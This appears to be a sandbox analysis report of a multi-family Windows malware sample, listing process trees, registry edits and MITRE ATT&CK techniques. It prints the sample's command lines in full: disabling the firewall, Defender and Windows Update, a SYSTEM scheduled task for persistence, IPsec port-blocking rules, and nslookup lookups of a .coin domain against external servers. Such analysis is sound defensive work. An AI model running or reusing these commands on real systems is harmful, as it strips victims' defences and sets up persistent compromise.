Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	cksygut.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2228	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4860	schtasks.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
3644	yjixppqtbckkefy26792.exe
756	cksygut.exe
756	cksygut.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
Token: SeDebugPrivilege	5364	cksygut.exe
Token: SeDebugPrivilege	756	cksygut.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
5444	hentai.exe
5668	xchlyg.exe
5364	cksygut.exe
4584	hentai.exe
756	cksygut.exe
2872	hentai.exe
3644	yjixppqtbckkefy26792.exe
1180	cksygut.exe
748	hentai.exe
5108	cksygut.exe
1488	hentai.exe
1192	cksygut.exe
1868	hentai.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1592 wrote to memory of 5444	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe	78
PID 1592 wrote to memory of 5444	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe	78
PID 1592 wrote to memory of 5444	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe	78
PID 1592 wrote to memory of 3960	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe	79
PID 1592 wrote to memory of 3960	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe	79
PID 1592 wrote to memory of 3960	1592	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe	79
PID 3960 wrote to memory of 2228	3960	cmd.exe	82
PID 3960 wrote to memory of 2228	3960	cmd.exe	82
PID 3960 wrote to memory of 2228	3960	cmd.exe	82
PID 3960 wrote to memory of 5364	3960	cmd.exe	83
PID 3960 wrote to memory of 5364	3960	cmd.exe	83
PID 3960 wrote to memory of 5364	3960	cmd.exe	83
PID 5364 wrote to memory of 4584	5364	cksygut.exe	84
PID 5364 wrote to memory of 4584	5364	cksygut.exe	84
PID 5364 wrote to memory of 4584	5364	cksygut.exe	84
PID 756 wrote to memory of 2872	756	cksygut.exe	86
PID 756 wrote to memory of 2872	756	cksygut.exe	86
PID 756 wrote to memory of 2872	756	cksygut.exe	86
PID 756 wrote to memory of 3644	756	cksygut.exe	87
PID 756 wrote to memory of 3644	756	cksygut.exe	87
PID 756 wrote to memory of 3644	756	cksygut.exe	87
PID 756 wrote to memory of 4964	756	cksygut.exe	88
PID 756 wrote to memory of 4964	756	cksygut.exe	88
PID 756 wrote to memory of 4964	756	cksygut.exe	88
PID 756 wrote to memory of 5004	756	cksygut.exe	90
PID 756 wrote to memory of 5004	756	cksygut.exe	90
PID 756 wrote to memory of 5004	756	cksygut.exe	90
PID 756 wrote to memory of 2392	756	cksygut.exe	92
PID 756 wrote to memory of 2392	756	cksygut.exe	92
PID 756 wrote to memory of 2392	756	cksygut.exe	92
PID 756 wrote to memory of 4488	756	cksygut.exe	94
PID 756 wrote to memory of 4488	756	cksygut.exe	94
PID 756 wrote to memory of 4488	756	cksygut.exe	94
PID 4488 wrote to memory of 840	4488	cmd.exe	96
PID 4488 wrote to memory of 840	4488	cmd.exe	96
PID 4488 wrote to memory of 840	4488	cmd.exe	96
PID 4488 wrote to memory of 4860	4488	cmd.exe	97
PID 4488 wrote to memory of 4860	4488	cmd.exe	97
PID 4488 wrote to memory of 4860	4488	cmd.exe	97
PID 756 wrote to memory of 2356	756	cksygut.exe	98
PID 756 wrote to memory of 2356	756	cksygut.exe	98
PID 756 wrote to memory of 2356	756	cksygut.exe	98
PID 756 wrote to memory of 4064	756	cksygut.exe	100
PID 756 wrote to memory of 4064	756	cksygut.exe	100
PID 756 wrote to memory of 4064	756	cksygut.exe	100
PID 756 wrote to memory of 2196	756	cksygut.exe	102
PID 756 wrote to memory of 2196	756	cksygut.exe	102
PID 756 wrote to memory of 2196	756	cksygut.exe	102
PID 756 wrote to memory of 4288	756	cksygut.exe	104
PID 756 wrote to memory of 4288	756	cksygut.exe	104
PID 756 wrote to memory of 4288	756	cksygut.exe	104
PID 756 wrote to memory of 5020	756	cksygut.exe	106
PID 756 wrote to memory of 5020	756	cksygut.exe	106
PID 756 wrote to memory of 5020	756	cksygut.exe	106
PID 756 wrote to memory of 2904	756	cksygut.exe	108
PID 756 wrote to memory of 2904	756	cksygut.exe	108
PID 756 wrote to memory of 2904	756	cksygut.exe	108
PID 756 wrote to memory of 3348	756	cksygut.exe	110
PID 756 wrote to memory of 3348	756	cksygut.exe	110
PID 756 wrote to memory of 3348	756	cksygut.exe	110
PID 756 wrote to memory of 3372	756	cksygut.exe	112
PID 756 wrote to memory of 3372	756	cksygut.exe	112
PID 756 wrote to memory of 3372	756	cksygut.exe	112
PID 756 wrote to memory of 5832	756	cksygut.exe	114

C:\Users\Admin\AppData\Local\Temp\2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Users\Admin\AppData\Local\Temp\hentai.exe
  C:\Users\Admin\AppData\Local\Temp\hentai.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\wdabblgz\cksygut.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3960
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2228
- - C:\Windows\wdabblgz\cksygut.exe
    C:\Windows\wdabblgz\cksygut.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5364
  - - C:\Users\Admin\AppData\Local\Temp\hentai.exe
      C:\Users\Admin\AppData\Local\Temp\hentai.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4584

C:\Windows\SysWOW64\xchlyg.exe
C:\Windows\SysWOW64\xchlyg.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5668

C:\Windows\wdabblgz\cksygut.exe
C:\Windows\wdabblgz\cksygut.exe
1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Indicator Removal: Clear Persistence
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:756
- C:\Windows\TEMP\hentai.exe
  C:\Windows\TEMP\hentai.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2872
- C:\Windows\wdabblgz\yjixppqtbckkefy26792.exe
  C:\Windows\wdabblgz\yjixppqtbckkefy26792.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static delete all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4964
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5004
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lyebcizip" /ru system /tr "cmd /c C:\Windows\Fonts\cksygut.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:840
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lyebcizip" /ru system /tr "cmd /c C:\Windows\Fonts\cksygut.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4860
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2356
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4064
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2196
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4288
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5020
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2904
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3348
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3372
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:5832
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2744
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:908
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:5272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5744
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5400
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5700
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:5940
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4752
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1772
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:3608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2464
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:3164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3744
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:4212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5796
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3512
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6136
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:3192
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin seed1.emercoin.com
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1820
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin seed1.emercoin.com
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin seed2.emercoin.com
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5488
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin seed2.emercoin.com
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:3088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 161.97.219.84
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 161.97.219.84
    3⤵
    - Unexpected DNS network traffic destination
    PID:868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 163.172.168.171
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3756
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 163.172.168.171
    3⤵
    - Unexpected DNS network traffic destination
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 94.103.153.176
  2⤵
  PID:5808
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 94.103.153.176
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:3560
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 207.192.71.13
  2⤵
  PID:384
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 207.192.71.13
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 178.63.116.152
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 178.63.116.152
    3⤵
    - Unexpected DNS network traffic destination
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 51.77.227.84
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5460
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 51.77.227.84
    3⤵
    - Unexpected DNS network traffic destination
    PID:3776
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 188.226.146.136
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 188.226.146.136
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:5472
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 51.75.173.177
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4960
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 51.75.173.177
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:4348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 79.124.7.81
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1084
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 79.124.7.81
    3⤵
    - Unexpected DNS network traffic destination
    PID:4484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 144.76.103.143
  2⤵
  - System Location Discovery: System Language Discovery
  PID:840
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 144.76.103.143
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 5.132.191.104
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1968
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 5.132.191.104
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:5368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 13.239.157.177
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4340
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 13.239.157.177
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:2360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 207.148.83.241
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4336
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 207.148.83.241
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:5688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 165.227.40.43
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 165.227.40.43
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.204.111
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 142.4.204.111
    3⤵
    - Unexpected DNS network traffic destination
    PID:3340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.205.47
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3708
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 142.4.205.47
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:3568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 198.100.148.224
  2⤵
  PID:3036
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 198.100.148.224
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 159.203.38.175
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2824
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 159.203.38.175
    3⤵
    - Unexpected DNS network traffic destination
    PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 66.70.228.164
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3448
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 66.70.228.164
    3⤵
    - Unexpected DNS network traffic destination
    PID:5484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 51.254.25.115
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5940
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 51.254.25.115
    3⤵
    - Unexpected DNS network traffic destination
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 185.84.81.194
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 185.84.81.194
    3⤵
    - Unexpected DNS network traffic destination
    - System Location Discovery: System Language Discovery
    PID:3948

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\cksygut.exe
1⤵
PID:3692
- C:\Windows\Fonts\cksygut.exe
  C:\Windows\Fonts\cksygut.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1180
- - C:\Windows\TEMP\hentai.exe
    C:\Windows\TEMP\hentai.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:748

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\cksygut.exe
1⤵
PID:1472
- C:\Windows\Fonts\cksygut.exe
  C:\Windows\Fonts\cksygut.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5108
- - C:\Windows\TEMP\hentai.exe
    C:\Windows\TEMP\hentai.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1488

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\cksygut.exe
1⤵
PID:2800
- C:\Windows\Fonts\cksygut.exe
  C:\Windows\Fonts\cksygut.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1192
- - C:\Windows\TEMP\hentai.exe
    C:\Windows\TEMP\hentai.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1868

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

